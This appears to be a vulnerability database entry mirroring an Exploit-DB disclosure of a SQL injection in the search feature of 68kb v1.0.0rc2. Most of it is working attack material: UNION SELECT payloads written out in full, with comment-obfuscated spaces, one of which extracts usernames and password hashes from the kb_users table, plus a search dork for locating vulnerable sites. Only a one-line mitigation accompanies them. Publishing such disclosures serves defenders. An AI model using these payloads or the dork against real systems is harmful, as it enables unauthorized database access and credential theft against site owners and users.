68kb SQLI

vendor:

68kb

by:

Jelmer de Hen

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: 68kb

Affected Version From: v1.0.0rc2

Affected Version To: v1.0.0rc2

Patch Exists: NO

Related CWE: N/A

CPE: 68kb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

An attacker can exploit a SQL injection vulnerability in 68kb v1.0.0rc2 to gain access to the database. The attacker can use the search feature to inject malicious SQL code. The attacker can use the code '%')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#' to gain access to the database. The attacker can also use the code '%')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#' to gain access to usernames and passwords if the default prefix of kb_ is used during the installation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

Exploit Title: 68kb SQLI
Date: 2010-03-28
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
Version: v1.0.0rc2

Go to /search
and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#
Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/.
Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation:
search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#

Dork: "Powered by 68kb"

-Jelmer de Hen